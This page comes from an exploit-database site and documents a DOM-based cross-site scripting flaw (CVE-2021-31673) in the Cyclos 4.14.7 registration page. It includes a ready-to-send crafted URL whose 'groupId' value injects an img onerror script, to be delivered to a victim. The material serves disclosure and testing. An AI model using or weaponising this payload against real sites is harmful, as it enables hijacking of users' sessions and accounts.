[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Cyclos 4.14.7 - (groupId) DOM Based Cross-Site Scripting Vulnerability

Author
Tin Pham
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-37711
Category
web applications
Date add
12-05-2022
CVE
CVE-2021-31673
Platform
php
# Exploit Title: Cyclos 4.14.7 - 'groupId' DOM Based Cross-Site Scripting (XSS)
# Exploit Author: Tin Pham aka TF1T of VietSunshine Cyber Security Services
# Vendor Homepage: https://www.cyclos.org/
# Version: Cyclos 4.14.7 (and prior)
# Tested on: Ubuntu
# CVE : CVE-2021-31673

# Description: 
A Dom-based Cross-site scripting (XSS) vulnerability at registration account in Cyclos 4 PRO.14.7 and prior allows remote attackers to inject arbitrary web script or HTML via the 'groupId' parameter.

# Steps to reproduce: 
An attacker sends a draft URL

[IP]/#users.users.public-registration!groupId=1%27%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E to victim.

When a victim opens the URL, XSS will be triggered.

#  0day.today [2024-12-25]  #